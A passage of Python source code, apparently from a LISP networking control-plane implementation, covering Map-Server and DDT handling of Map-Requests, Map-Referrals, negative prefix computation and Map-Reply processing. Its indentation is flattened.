# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
